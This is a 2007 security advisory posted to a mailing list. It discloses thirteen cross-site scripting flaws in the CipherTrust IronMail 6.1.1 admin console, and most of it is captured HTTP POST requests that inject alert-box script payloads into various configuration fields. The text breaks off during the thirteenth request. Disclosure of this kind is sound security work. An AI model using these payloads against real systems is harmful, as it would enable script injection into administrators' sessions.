Multiple XSS in IronMail

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Founded multiple XSS in IronMail.

See attached advisory. Spanish version in http://www.514.es.

Regards,

- J
          ===============================
                   - Advisory -
          ===============================
  
  Título:   Multipls XSS in Cypherstrust Ironmail 6.1.1
    Risk:   Medium
    Date:   20.Feb.2007
  Author:   Javier Olascoaga <jolascoaga *at* 514.es>      
     WEB:   http://www.514.es/


.: [ INTRO ] :.
	
IronMail protects enterprise email systems from inbound threats: spam, viruses;
or hackers trying to take down or take over the e-mail system. IronMail protects
enterprise email systems from outbound threats: regulatory compliance violations
, corporate policy violations, or theft ("leakage") of confidential information 
or intellectual property. IronMail protects enterprise email systems from threats that haven't even been identified yet. 

.: [ TECHNICAL DESCRIPTION ] :.

During the development of the technical tests against the IronMail mail system 
have been detected several Cross Site Scripting vulnerabilities in the 
administration console of the product.


Next you can find the XSS founded:

.: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer:
https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11;
/admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=;
JSESSIONID=B227892A258E91419C09469E49AED4D4
  'rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit


.: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Wmtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Umtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Rmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Tmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8


.: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Klicense=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=15;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&rows%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #12 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #13 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%